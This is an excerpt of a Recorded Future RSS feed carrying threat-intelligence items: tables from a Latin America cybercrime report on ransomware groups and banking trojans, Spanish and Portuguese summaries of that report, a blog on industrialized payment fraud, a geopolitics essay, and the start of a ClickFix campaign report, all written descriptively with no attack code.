            <div>0</div>
          </div>
          <div>
            <div>The Gentlemen</div>
            <div>22</div>
            <div>3</div>
            <div>1</div>
            <div>0</div>
            <div>0</div>
            <div>1</div>
          </div>
          <div>
            <div>Kazu</div>
            <div>21</div>
            <div>0</div>
            <div>0</div>
            <div>17</div>
            <div>0</div>
            <div>2</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Sample Data of Ransomware Incidents Impacting Healthcare, Government, and Financial Sectors in LAC Countries in 2025</h2>
        <div>
          <div>
            <div><strong>Ransomware Group</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>Sector</strong></div>
          </div>
          <div>
            <div>Safepay</div>
            <div>Argentina</div>
            <div>Healthcare</div>
          </div>
          <div>
            <div>The Gentlemen</div>
            <div>Brazil</div>
            <div>Healthcare</div>
          </div>
          <div>
            <div>Kazu</div>
            <div>Colombia</div>
            <div>Government</div>
          </div>
          <div>
            <div>Kazu</div>
            <div>Mexico</div>
            <div>Government</div>
          </div>
          <div>
            <div>Qilin (Agenda)</div>
            <div>Ecuador</div>
            <div>Finance</div>
          </div>
          <div>
            <div>Qilin (Agenda)</div>
            <div>Argentina</div>
            <div>Finance</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Trends from the Most Active Banking Trojans in LAC in 2025</h2>
        <div>
          <div>
            <div><strong>Banking Trojan</strong></div>
            <div><strong>Attributes</strong></div>
            <div><strong>Activity in 2026</strong></div>
          </div>
          <div>
            <div>Grandoreiro</div>
            <div>Spreads through phishing emails with seemingly legitimate documents, such as PDFs. Once on a device, it performs anti-sandbox checks, logs keystrokes, and communicates with C2 servers to exfiltrate sensitive banking credentials</div>
            <div>New variants emerged with advanced evasion techniques, rendering them more effective at bypassing modern security measures</div>
          </div>
          <div>
            <div>Crocodilus</div>
            <div>Employs sophisticated tactics such as remote control capabilities, keylogging, overlay attacks to capture user credentials, and the ability to harvest cryptocurrency wallet seed phrases</div>
            <div>Expanded operational reach by targeting users in Poland, Spain, Brazil, Argentina, Indonesia, the US, and India</div>
          </div>
          <div>
            <div>Mispadu (URSA)</div>
            <div>Employs sophisticated infection methods, including spam emails containing malicious PDFs that trigger multi-stage download processes that deploy the Mispadu payload after performing anti-sandbox and anti-virtual machine checks</div>
            <div>Insikt Group created a YARA rule to detect Mispadu after analysis indicated the trojan had targeted several LAC banks</div>
          </div>
          <div>
            <div>Astaroth (Guildma)</div>
            <div>Distribution methods include spearphishing attacks and the use of compromised cloud infrastructure for hosting malicious content. Insikt Group conducted technical static analysis and detection using sigma rules</div>
            <div>Resurfaced with a multi-stage campaign, “STAC3150”, involving WhatsApp session hijacking, credential theft, and persistence on compromised systems</div>
          </div>
          <div>
            <div>SORVEPOTEL</div>
            <div>Targeted Brazil in several campaigns; Insikt Group assesses that at least some SORVEPOTEL operators are likely Portuguese-speaking, based on language artifacts in the panels analyzed and consistent targeting of Brazilian victims; analysis of a notable campaign dubbed “Water Saci” <a href="https://app.recordedfuture.com/portal/research/insikt/doc:_BftJL"></a>indicates WhatsApp Web was used for distribution</div>
            <div>Analysis of the new infrastructure tied to the SORVEPOTEL loader demonstrates that it has distributed Coyote and Maverick</div>
          </div>
          <div>
            <div>Casabaneiro (“Mekotio” and “Metamorfo”)</div>
            <div>Primarily targets financial institutions in LAC, leverages phishing emails that typically contain malicious URLs, which lead to ZIP archives or ISO files with payloads that execute PowerShell scripts designed for obfuscation and evading detection</div>
            <div>Water Saci campaign targeting Brazilian financial platforms via WhatsApp propagation linked to Casbaneiro malware family</div>
          </div>
          <div>
            <div>BBTok</div>
            <div>Distribution methods that trigger infections via LNK files and exhibit advanced capabilities for credential theft and data exfiltration, leveraging techniques such as dynamic-link library (DLL) embedding within downloaded files and the use of legitimate Windows utility commands for evasion</div>
            <div>A new tactic emerged where the primary delivery method was WhatsApp</div>
          </div>
          <div>
            <div>Coyote</div>
            <div>Primarily targets Brazilian users, capable of executing keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials; Coyote’s infrastructure is dynamic and hosted on various platforms, indicating robust evasion techniques by its operators</div>
            <div>Coyote remained active in 2025 and was observed in a WhatsApp-based worm campaign that used self-propagating messages containing malicious ZIP archives that further distributed the malware</div>
          </div>
          <div>
            <div>Herodotus</div>
            <div>Distributed through smishing messages that lure victims into downloading malicious APKs; Herodotus has been observed primarily targeting users in countries like Brazil and Italy</div>
            <div>Insikt Group analyzed a sample, where Herodotus impersonated a security application named “Modulo Seguranca Stone” in a campaign in Brazil</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Panorama del cibercrimen en América Latina y el Caribe]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-es</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-es</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Este informe ofrece una visión general de las tendencias y desarrollos en el ecosistema cibercriminal de América Latina y el Caribe (LAC) en 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Resumen ejecutivo</h2>
        <p>Este informe brinda un resumen de las tendencias y los desarrollos en el ecosistema cibercriminal de América Latina y el Caribe (LAC) en 2025. Insikt Group identificó que los actores maliciosos que operan en la región de LAC o que la tienen como objetivo utilizan principalmente aplicaciones cliente-servidor y plataformas de mensajería con cifrado de extremo a extremo como Telegram, así como foros de la dark web y de acceso especial en inglés o ruso, para comunicarse y llevar a cabo sus actividades. Los actores maliciosos demuestran una mayor sofisticación en sus operaciones, ya que adaptan sus tácticas, técnicas y procedimientos (TTP) con el tiempo, pero siguen apoyándose principalmente en métodos tradicionales como el phishing y la ingeniería social, la distribución de malware, y el ransomware. A partir de nuestros análisis, determinamos que Brasil, México y Argentina son los países más atacados por cibercriminales financieros, probablemente porque son las economías más grandes de la región de LAC. Además, a partir de esta investigación, Insikt Group determinó que los actores maliciosos a menudo atacan industrias críticas, como las de salud, finanzas y gobierno, porque poseen datos de alto valor, afrontan urgencias operativas y, a veces, utilizan sistemas antiguos que pueden ser vulnerables.</p>
        <h2>Principales hallazgos</h2>
        <ul>
          <li>Insikt Group estima que el foro criminal DarkForums y la plataforma de mensajería Telegram son los principales medios de acceso especial utilizados por los actores maliciosos que operan en la región LAC o que la tienen como objetivo.</li>
          <li>Los actores maliciosos que operan en la región LAC o que la tienen como objetivo suelen estar impulsados por motivos financieros y, a menudo, utilizan la ingeniería social, el ransomware y diferentes formas de malware móvil para obtener acceso inicial a las instituciones gubernamentales, de salud o financieras.</li>
          <li>En 2025, Insikt Group registró 452 incidentes de ransomware que afectaron la región de LAC. Las cinco principales industrias afectadas fueron las de salud, fabricación, gobierno, tecnología de la información y educación; todas ellas observaron un aumento notable en los ataques en comparación con el año anterior.</li>
          <li>Insikt Group identificó que los actores maliciosos usan troyanos bancarios, especialmente las variantes más establecidas. En particular, estos actores usaron troyanos bancarios en campañas de smishing dirigidas a usuarios de WhatsApp con el objetivo de acceder a datos financieros y robar credenciales.</li>
          <li>Insikt Group identificó a LummaC2 como el ladrón de información (infostealer) más prolífico que afectó a organizaciones de la región LAC en el primer semestre de 2025, y a Vidar en el segundo semestre, tras la intervención de las fuerzas del orden contra LummaC2</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Panorama do cibercrime na América Latina e Caribe]]></title>
            <link>https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-pt</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/latin-america-and-the-caribbean-cybercrime-landscape-pt</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Este relatório oferece uma visão geral das tendências e desenvolvimentos no ecossistema cibercriminoso da América Latina e do Caribe (LAC) em 2025.]]></description>
            <content:encoded><![CDATA[
        <h2>Resumo executivo</h2>
        <p>Este relatório apresenta uma visão geral das tendências e desenvolvimentos no ecossistema do cibercrime na América Latina e Caribe (LAC) em 2025. O Insikt Group descobriu que os agentes de ameaças que operam na região da América Latina e Caribe (LAC) ou que a têm como alvo usam predominantemente aplicações cliente-servidor e plataformas de mensagens criptografadas de ponta a ponta, como o Telegram, bem como a dark web estabelecida em inglês ou russo e fóruns de acesso restrito, para se comunicarem e realizarem atividades. Os agentes de ameaças demonstram crescente sofisticação nas operações, adaptando táticas, técnicas e procedimentos (TTPs) ao longo do tempo, embora ainda dependam principalmente de métodos tradicionais, como phishing e engenharia social, distribuição de malware e ransomware. Com base na nossa análise, determinamos que Brasil, México e Argentina foram os países mais visados por cibercriminosos com motivação financeira, provavelmente por serem as maiores economias da América Latina e Caribe. Além disso, com base nesta pesquisa, o Insikt Group descobriu que os agentes de ameaças frequentemente visavam a setores críticos, como saúde, finanças e governo, pois esses setores detêm dados valiosos, enfrentam urgências operacionais e, às vezes, dependem de sistemas legados que podem ser vulneráveis.</p>
        <h2>Principais descobertas</h2>
        <ul>
          <li>O Insikt Group avalia que o fórum criminoso DarkForums e a plataforma de mensagens Telegram são os principais fóruns de acesso restrito e plataformas de comunicação usados por agentes maliciosos que operam na região da América Latina e Caribe ou que têm essa região como alvo.</li>
          <li>Os agentes de ameaça que operam na América Latina e Caribe (LAC) ou que têm como alvo a região são geralmente motivados por interesses financeiros e frequentemente adotam engenharia social, ransomware e várias formas de malware em aparelhos móveis, a fim de terem acesso inicial a instituições governamentais, financeiras e de saúde.</li>
          <li>Em 2025, o Insikt Group registrou 452 incidentes de ransomware que afetaram a região da América Latina e Caribe. Os cinco setores mais afetados foram saúde, manufatura, governo, tecnologia da informação e educação, que registraram um aumento considerável nos ataques em comparação ao ano anterior.</li>
          <li>O Insikt Group continuou a identificar trojans bancários sendo usados por agentes de ameaças; os mais usados são as variantes já estabelecidas. Especificamente, os agentes maliciosos usaram trojans bancários em campanhas de smishing direcionadas a usuários do WhatsApp para terem acesso a dados financeiros e roubarem credenciais.</li>
          <li>O Insikt Group identificou o LummaC2 como o ladrão de informações (infostealer) mais prolífico, afetando organizações na América Latina e Caribe no primeiro semestre de 2025; e o Vidar no segundo semestre, após a desarticulação das atividades do LummaC2 pelas autoridades policiais.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_170df75f7415b871f0e4a8ee069a6ce7922d8e7ae.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Industrialization of the Fraud Ecosystem Blog]]></title>
            <link>https://www.recordedfuture.com/ko/blog/industrialization-of-the-fraud-ecosystem-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/industrialization-of-the-fraud-ecosystem-blog</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Payment fraud has industrialized, and that's a defensive advantage. Learn how standardized attack infrastructure creates detectable patterns that financial institutions can act on before losses occur.]]></description>
            <content:encoded><![CDATA[
        <p>Payment fraud no longer operates as a collection of discrete schemes run by individual threat actors.</p>
        <p>It is increasingly sustained by an industrial support ecosystem: purpose-built infrastructure, packaged toolkits, and professionalized services that allow threat actors to maximize fraud output while minimizing the skill and effort required to execute attacks.<br /><br />According to Recorded Future's <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a>, this industrialization was driven by technical advances and increasingly professionalized support services.</p>
        <p>The Magecart e-skimmer supply chain is the clearest example. Full-stack e-skimmer kits and Malware-as-a-Service (MaaS) offerings have made large-scale compromise of ecommerce websites accessible to less technically capable threat actors.</p>
        <p>The "Sniffer by Fleras" kit, responsible for 26% of all e-skimmer infections observed in 2025, includes a web-based portal for generating malicious scripts and a management server for stolen data. The result was more than 10,500 unique Magecart infections active at some point during the year, likely compromising more than 23 million transactions.</p>
        <p>Additionally, the "AcceptCar" e-skimmer, discovered in H2 2025, illustrates how far the service model has matured. Operators handle installation and operation on compromised e-commerce sites; in return, threat actors pay 50% of proceeds from card data sales or 70% of raw data intake. Using services like AcceptCar, fraud threat actors can participate in large-scale compromise operations without owning or managing any underlying infrastructure.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1cf0554d71b8866a15155b12102ca303275f2a8cd.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="804" />
            </div>
          </div>
          <div>
            <div>Figure 1: Line graph showing Magecart e-skimmer infections in 2025, by different groups, kits, and techniques. (Source: Recorded Future)</div>
          </div>
        </div>
        <p><a href="https://pages.recordedfutureext.com/2025-Purchase-Scams-Report.html?_gl=1*1t58uut*_gcl_au*NTQ0NDYzNDU2LjE3NzI0ODkyMDc.">Purchase scam operations</a> reflect a similar dynamic. <a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> identified more than 3,600 scam merchant accounts in 2025, up 2.5x from 2024, spanning at least 40 countries and 230 acquirers.</p>
        <p>Recurring patterns in merchant registration data indicate that scam operators have standardized their merchant acquisition workflows, standing up fraudulent payment infrastructure at scale through repeatable, low-friction processes.</p>
        <p>Card testing operates on the same service-economy logic. Telegram-based card testing services validated at least 27 million card records in 2025 through public-facing card generation and testing channels that any threat actor can access.</p>
        <p>Among dark web checker services, over 1,350 legitimate merchant accounts were abused for card testing, with 94% not observed prior to 2025, suggesting systematic rotation to stay ahead of detection.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_102beab38154914c05c00b2fffd52e34417ac6a84.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="466" />
            </div>
          </div>
          <div>
            <div>Figure 2: Graphic illustrating the purchase scam attack chain. (Source: Recorded Future)</div>
          </div>
        </div>
        <h2>The Ecosystem Is Concentrated Upstream</h2>
        <p>Notably, each of these industrialized attack vectors sits <a href="https://www.recordedfuture.com/ko/blog/getting-ahead-of-payment-fraud">upstream of the fraudulent transaction</a>. E-skimmer infections and scam merchants compromise card data during online purchases. Card testing validates that stolen data before it’s monetized.</p>
        <div>
          <div>
            <div>
              <p>Fraud outcomes are visible, but the pathways that enable them are often not.</p>
              <p><a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a></p>
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <p>"Fraud outcomes are visible, but the pathways that enable them are often not."</p>
        <p>This industrialized scale across these attack vectors requires standardization, and standardization produces detectable patterns.</p>
        <p>When 26% of e-skimmer infections trace back to a single kit, when scam operators reuse merchant registration patterns across hundreds of acquirers, when card testers rotate through predictable BIN attack workflows, the convergence that makes fraud scalable also makes it mappable. As that standardization deepens, a single indicator of compromise reaches further across the threat landscape.</p>
        <p>That standardization creates something concrete: a window.</p>
        <p>Magecart infections are active and identifiable before stolen card data is harvested.<br />Scam merchants often display detectable signals, including recent domain registration, merchant rotation, and merchant category code mismatches.</p>
        <p>Card testing activity reveals when a monetization attempt is likely to occur.</p>
        <p>Each stage represents an opportunity to act before fraud registers as a financial loss.</p>
        <h2>Transaction Monitoring Looks at the Wrong End of the Lifecycle</h2>
        <p>Transaction monitoring and behavioral fraud models are built to detect anomalies at the point of payment, like unusual spend patterns, velocity, and geographic inconsistencies. They do what they were designed to, but provide no visibility into the increasingly industrialized, pre-monetization stages that were built to avoid detection by these traditional processes.</p>
        <p>Purchase scams are explicitly designed to circumvent transaction-based controls by manipulating cardholders into authorizing the fraudulent transaction themselves, making the payment appear legitimate by design.</p>
        <p>Card testers cycle through new merchants specifically because historical tester merchants get flagged (94% of tester merchants identified in 2025 were not previously observed). A detection approach built around transaction signals will always be working with information that arrives after the upstream infrastructure has already done its job.</p>
        <p>As the upstream ecosystem industrializes, the volume of activity that transaction monitoring cannot see has grown. With purchase scam detections more than quadrupling year-over-year and Magecart infections having likely compromised more than 23 million transactions in 2025 alone, the cost of that blind spot compounds.</p>
        <p><strong>Maintaining an effective fraud posture will increasingly require financial institutions to complement reactive account monitoring with proactive, intelligence-informed defenses.</strong></p>
        <h2>How Recorded Future Payment Fraud Intelligence Addresses This</h2>
        <p><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> monitors each of the upstream stages discussed in this post.</p>
        <p>With daily monitoring of Magecart-infected sites and enriched merchant data that integrates with transaction monitoring, Payment Fraud Intelligence can enable detection of high-risk merchants months before stolen card data appears for sale.<br /><br />Additionally, the Scam Merchants dataset can identify fraudulent merchant accounts and their associated domains before customers are defrauded and before downstream card data reaches criminal markets.</p>
        <p>Tester merchant monitoring surfaces card testing activity as an early signal of which portfolios are being targeted ahead of any monetization attempt.</p>
        <p>Because Payment Fraud Intelligence monitors the sources, kits, and infrastructure that threat actors have increasingly standardized around, a single identified indicator can surface exposure across a portfolio at scale.<br /><br />According to Recorded Future data, 75% of compromised cards are identified before fraud occurs, and 90% of compromised card assets are identified within hours of a breach.</p>
        <p>The pre-monetization window will not narrow as the fraud ecosystem matures — if anything, the report's data suggests it will widen as standardization deepens. Financial institutions with visibility into that window can act before losses occur. Those without it will continue to respond after the fact.</p>
        <p>Read <em>the full</em> <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a> to explore this year's findings in depth.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_153cda5c0105b1bf45066ca44c92e63fe63172790.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Shift: An Era of Quantum Geopolitics]]></title>
            <link>https://www.recordedfuture.com/ko/blog/the-shift-an-era-of-quantum-geopolitics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/the-shift-an-era-of-quantum-geopolitics</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The expanding conflict around Iran signals a deeper shift. We have entered an era of quantum geopolitics, where the old rules of the international order no longer apply]]></description>
            <content:encoded><![CDATA[
        <p>The expanding conflict around Iran signals a deeper shift. We have entered an era of <strong>quantum geopolitics</strong>, where the old rules of the international order no longer apply. What began as a regional confrontation is already reshaping global markets, supply chains, and corporate security planning. Leaders must adapt how they think, spend, and communicate in a system where uncertainty is not a risk to manage—it is the operating environment itself.</p>
        <h2><strong>What is Quantum Geopolitics?</strong></h2>
        <p>A useful analogy comes from physics.<br /><br />Classical systems produce predictable outcomes. Quantum systems behave probabilistically, where interactions in one place can produce distant effects.</p>
        <p>International politics increasingly resembles the latter.<br /><br />The assumptions that shaped corporate strategy for decades—durable alliances, expanding globalization, and broadly coherent regulation—are weakening. Geopolitical shocks now move rapidly through tightly interconnected systems.</p>
        <p>Four dynamics define how this system now behaves.</p>
        <p>🌓 <strong>Superposition: Friends, Rivals, and Everything in Between</strong></p>
        <p>Countries can no longer be neatly categorised “ally” or “adversary.” They exist in overlapping states, with true alignment revealed only in moments of crisis.</p>
        <p>States balance security partnerships with the West while maintaining economic ties with rivals. Turkey <a href="https://carnegieendowment.org/europe/strategic-europe/2025/11/turkey-stakes-its-claim-in-the-ukraine-peace-process">supports</a> Ukraine diplomatically while <a href="https://turkishminute.com/2025/09/09/turkey-has-become-russias-second-largest-trading-partner-minister-says/">sustaining</a> trade flows that benefit Russia. India <a href="https://www.whitehouse.gov/briefings-statements/2025/02/united-states-india-joint-leaders-statement/">deepens</a> defence ties with the United States even as it increases purchases of Russian oil.</p>
        <p>Public statements offer limited guidance. Trade flows, enforcement patterns, and technology controls are more reliable indicators of intent.</p>
        <p>For multinational firms, geopolitical positioning is no longer fixed. It is fluid.</p>
        <p>🌀 <strong>The End of Guarantees: Promises Now Come with Caveats</strong></p>
        <p>Security commitments, trade access, and regulatory stability have shifted from certainties to probabilities.</p>
        <p>Export controls can reroute supply chains within months. Sanctions regimes expand or unwind quickly. Even long-standing alliances depend on political will at the moment they are tested.</p>
        <p>For businesses, this means long-term investments now carry elevated policy risk.</p>
        <p>Leaders must plan for variance.</p>
        <p>🧬 <strong>Quantum Entanglement: Local Conflicts Are Not Local</strong></p>
        <p>Global systems—financial, technological, logistical—are tightly coupled. Regional conflicts now generate immediate global effects.</p>
        <p>Threats to Gulf commercial hubs <a href="https://www.thebanker.com/content/c0847003-aa2d-4c4a-92ae-e8714a5f6bb2">disrupt</a> international banking. Instability in the Strait of Hormuz <a href="https://www.orfonline.org/english/expert-speak/the-global-costs-of-instability-in-the-strait-of-hormuz">drives</a> energy price volatility and <a href="https://www.insurancejournal.com/news/international/2026/03/17/862173.htm">strains</a> global shipping insurance. Cyber <a href="https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know">campaigns</a> tied to the conflict target companies far beyond the region.</p>
        <p>Disruption is rarely contained. Risk can no longer be managed by geography or function alone.</p>
        <p>🔬 The Observer Effect: Whoever Sets the Rules First Wins</p>
        <p>Influence increasingly derives from shaping rules rather than operating within them.</p>
        <p>States that move early to establish standards in artificial intelligence, semiconductors, digital infrastructure, and financial regulation compel others to adapt.</p>
        <p>Waiting for clarity can therefore be a strategic liability in itself.<br />If you do not shape the agenda, you become subject to it.</p>
        <h2><strong>Why This Moment Feels Different</strong></h2>
        <p>These dynamics are most visible in cyberspace, where geopolitical competition unfolds continuously below the threshold of open conflict.</p>
        <p>State-sponsored actors operate inside corporate networks without triggering overt confrontation. Criminal groups, proxies, and intelligence services overlap, complicating attribution and response.</p>
        <p>The boundary between geopolitical conflict and corporate exposure is now thin. A single breach can trigger regulatory scrutiny, customer loss, market volatility, and diplomatic tension at once.</p>
        <p>Cybersecurity is no longer a technical function. It is a core enterprise risk.</p>
        <h2><br /><strong>How Security Leaders Should Respond</strong></h2>
        <p>In a system governed by probabilities rather than predictability, security leaders must adapt how they think, allocate resources, and position their organizations.</p>
        <p>1. <strong>Mindset Shift: Scenarios, Not Forecasts</strong></p>
        <p>Replace long planning horizons and static risk assessments with continuous scenario planning. Tools such as the <a href="https://prescient2050.com/the-cone-of-plausibility-can-assist-your-strategic-planning-process/">Cone of Plausibility</a> can stress-test responses to sanctions escalation, maritime disruption, regulatory fragmentation, or supply chain shocks.<br /><br />Evaluate decision speed, cross-functional coordination, and response thresholds under pressure.<br />Adaptability matters more than accuracy.</p>
        <p>2. <strong>Spending Shift: Invest in Resilience, Not Just Efficiency</strong></p>
        <p>Systems optimized solely for efficiency often lack resilience.</p>
        <p>Diversifying suppliers, strengthening sanctions compliance, improving cybersecurity, and increasing visibility into third-party exposure can reduce vulnerability to geopolitical shocks.</p>
        <p>Resilience is not a defensive expense; it is operational insurance.</p>
        <p>3. <strong>Communication Shift: From Reporting to Action</strong></p>
        <p>Security leaders must translate geopolitical developments into clear decision frameworks before crises materialize.</p>
        <p>This requires close coordination across legal, finance, and operations, as well as proactive engagement with regulators and industry partners.</p>
        <p>Speed and clarity determine whether the organization shapes outcomes or reacts to them.</p>
        <h2><strong>Final Thoughts</strong></h2>
        <p>The Iran conflict offers a preview of what comes next. Alliances are conditional. Economic pressure, cyber activity, and regulatory responses unfold simultaneously.</p>
        <p>Quantum geopolitics does not eliminate strategy. It demands a different kind—one built on scenario readiness, structural resilience, and faster decision cycles.</p>
        <p>Leaders who wait for clarity will move too late.</p>
        <p>Those who organize for uncertainty will operate ahead of it.</p>
        <p><strong>To access the latest Insikt</strong> <strong>Group®</strong> <strong>research</strong> <a href="https://www.recordedfuture.com/ko/research/insikt-group">click here</a>.</p>
        <p><em><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a></em> <em>helps Recorded Future secure our world with threat intelligence. With deep experience in government, law enforcement, military, and intelligence agencies, we power the Recorded Future Platform with analyst-validated data, analytics, along with cyber and geopolitical intelligence. This enables our customers to reduce risk and prevent disruption.</em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_100c2720c5cfd6aa24faaccb21a0f62fb9d70448e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[ClickFix Campaigns Targeting Windows and macOS]]></title>
            <link>https://www.recordedfuture.com/ko/research/clickfix-campaigns-targeting-windows-and-macos</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/clickfix-campaigns-targeting-windows-and-macos</guid>
            <pubDate>Wed, 25 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.</p>
        <p>The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution, moving past simple verification by visually fooling victims with various fake challenges and demonstrating technical sophistication through operating system detection to tailor execution chains. Despite these structural differences, its operation is largely the same, showing that ClickFix’s core techniques work across platforms and only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.</p>
        <p>This living-off-the-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.</p>
        <p>To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets.</p>
        <p>Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.</li>
          <li>While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS).</li>
          <li>ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system shells living-off-the-land binaries (LOLBins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system.</li>
        </ul>
        <h2>Background</h2>
        <p>First <a href="https://www.todyl.com/blog/clickfix-evolution-copy-paste-social-engineering">documented</a> in late 2023, ClickFix has transitioned from a niche social engineering tactic to a cornerstone of the global cybercriminal ecosystem. ClickFix is a social engineering methodology that <a href="https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/">lures</a> victims into manually executing malicious commands by masquerading as a <a href="https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic">necessary technical</a> resolution for fabricated system errors or human-verification prompts. This technique represents an evolutionary shift from the FakeUpdates (SocGholish) <a href="https://www.proofpoint.com/uk/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update">model</a>, prioritizing manual user intervention to <a href="https://www.bitdefender.com/en-gb/blog/businessinsights/how-clickfix-cyberattack-technique-works?srsltid=AfmBOorcXXl_4BqrPLnwcNkY6CwC40PfEMhP6qzfszoh65C9Ko4teVBE">evade</a> the increasingly robust security features of modern web browsers and automated endpoint detection systems. In this context, the methodology embodies a "think smart, not hard" approach. The simplicity of relying on a manual user action makes it a potent defensive evasion tactic: bypassing typical browser-based security makes it difficult to detect, while the high number of threat actors using it makes it difficult to track across a fragmented threat landscape.</p>
